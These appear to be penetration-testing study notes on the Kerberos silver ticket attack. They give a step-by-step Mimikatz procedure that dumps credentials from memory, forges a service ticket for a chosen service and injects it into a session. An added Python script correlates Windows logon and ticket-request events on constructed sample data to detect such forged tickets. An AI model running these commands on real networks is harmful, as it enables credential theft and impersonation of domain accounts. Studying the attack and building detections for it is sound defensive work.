Silver Ticket Attack
the overpass the hash technique to acquire a Kerberos TGT, allowing us to authenticate using Kerberos. We can only use the TGT on the machine it was created for, but the TGS potentially offers more flexibility.
The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service. In addition, if the service tickets belong to the current user, then no administrative privileges are required.
So far, this attack does not provide us with any additional access, but it does offer flexibility in being able to choose which machine to use the ticket from. However, if a service is registered with a service principal name, this scenario becomes more interesting.
Previously, we demonstrated that we could crack the service account password hash and obtain the password from the service ticket. This password could then be used to access resources available to the service account.
However, if the service account is not a local administrator on any servers, we would not be able to perform lateral movement using vectors such as pass the hash or overpass the hash, and therefore, in these cases, we would need to use a different approach.
- whoami /user to get the current user's SID, e.g. S-1-5-21-1602875587-2787523311-2599479668-1103
- The SID defining the domain is the entire string except the RID at the end ( -1103 )
- Extract the NTLM hash of the service account:
- Mimikatz.exe
- privilege::debug
- sekurlsa::logonpasswords
- kerberos::purge to delete existing tickets
- kerberos::list to verify they are gone
- kerberos::golden /user:<user> /domain:<domain> /sid:<domain SID without the RID> /target:<fully qualified host name of the service> /service:<service_name> /rc4:<NTLM hash of the service account> /ptt
- misc::cmd to launch a cmd.exe with the injected ticket and verify success
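From the defender's side, the property that makes the ticket above work is also what exposes it: a forged service ticket is built from the service account's key and handed straight to the service, so the domain controller never issues it and records no service-ticket request (event 4769) for it, while the target host still records a Kerberos network logon (event 4624, logon type 3). The following Python is an added example, not part of the original notes, showing that correlation together with the domain-SID/RID split described in the list; the event records, host names and account names are constructed sample data, and the field names are assumptions modelled on the Windows security log rather than output of any real collector.

```python
"""Detection heuristic for forged service tickets (silver tickets).

Assumptions (not from the original notes): events have been normalised into
dicts with the fields used below; 4769 auditing ("Audit Kerberos Service
Ticket Operations") is enabled on the domain controllers. All records here
are constructed sample data.
"""
from datetime import datetime, timedelta
import re
from typing import Dict, List, Tuple

# Domain account SIDs look like S-1-5-21-<three sub-authorities>-<RID>.
SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid: str) -> Tuple[str, str]:
    """Split an account SID into (domain SID, RID), as the notes describe."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError("not a domain account SID: %s" % sid)
    return m.group(1), m.group(2)


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed sample data: service-ticket requests seen by the DCs (4769).
DC_4769: List[Dict] = [
    {"time": "2024-01-10 09:00:05", "account": "jeff@CORP.LOCAL",
     "service": "cifs/FILES01.corp.local"},
    {"time": "2024-01-10 09:02:10", "account": "alice@CORP.LOCAL",
     "service": "http/WEB01.corp.local"},
]

# Constructed sample data: network logons recorded on member servers (4624).
HOST_4624: List[Dict] = [
    # legitimate: a 4769 for jeff -> FILES01 exists two seconds earlier
    {"time": "2024-01-10 09:00:07", "host": "FILES01", "account": "jeff",
     "logon_type": 3, "auth_pkg": "Kerberos",
     "sid": "S-1-5-21-1602875587-2787523311-2599479668-1103"},
    # suspicious: Kerberos logon with no DC-issued ticket in the window
    {"time": "2024-01-10 09:20:00", "host": "FILES01", "account": "jeff",
     "logon_type": 3, "auth_pkg": "Kerberos",
     "sid": "S-1-5-21-1602875587-2787523311-2599479668-1103"},
    # NTLM logon: outside the scope of this heuristic
    {"time": "2024-01-10 09:06:00", "host": "WEB01", "account": "bob",
     "logon_type": 3, "auth_pkg": "NTLM",
     "sid": "S-1-5-21-1602875587-2787523311-2599479668-1105"},
]


def unmatched_kerberos_logons(logons: List[Dict], ticket_requests: List[Dict],
                              window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Return Kerberos network logons (4624, type 3) that have no 4769 for the
    same account and target host within `window` before the logon. These are
    candidates for a ticket the KDC never issued and deserve a closer look."""
    suspicious = []
    for lg in logons:
        if lg["logon_type"] != 3 or lg["auth_pkg"].lower() != "kerberos":
            continue
        t = _ts(lg["time"])
        matched = any(
            req["account"].split("@")[0].lower() == lg["account"].lower()
            and lg["host"].lower() in req["service"].lower()
            and timedelta(0) <= t - _ts(req["time"]) <= window
            for req in ticket_requests
        )
        if not matched:
            suspicious.append(lg)
    return suspicious


def sids_outside_domain(logons: List[Dict], domain_sid: str) -> List[Dict]:
    """Flag logons whose SID does not belong to the expected domain; a forged
    ticket built with a wrong /sid shows up here."""
    return [lg for lg in logons if split_sid(lg["sid"])[0] != domain_sid]


if __name__ == "__main__":
    for lg in unmatched_kerberos_logons(HOST_4624, DC_4769):
        print("no matching 4769:", lg["time"], lg["host"], lg["account"])
    domain_sid, _ = split_sid(HOST_4624[0]["sid"])
    print("foreign SIDs:", sids_outside_domain(HOST_4624, domain_sid))
```

The window is the tuning knob: a legitimate client can reuse a cached service ticket for its whole lifetime (hours), so a short window will produce false positives on busy file servers, and a window as long as the ticket lifetime will miss little but needs the DC logs retained for that long. The SID check is cheap and independent of timing, so run both.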
Reference: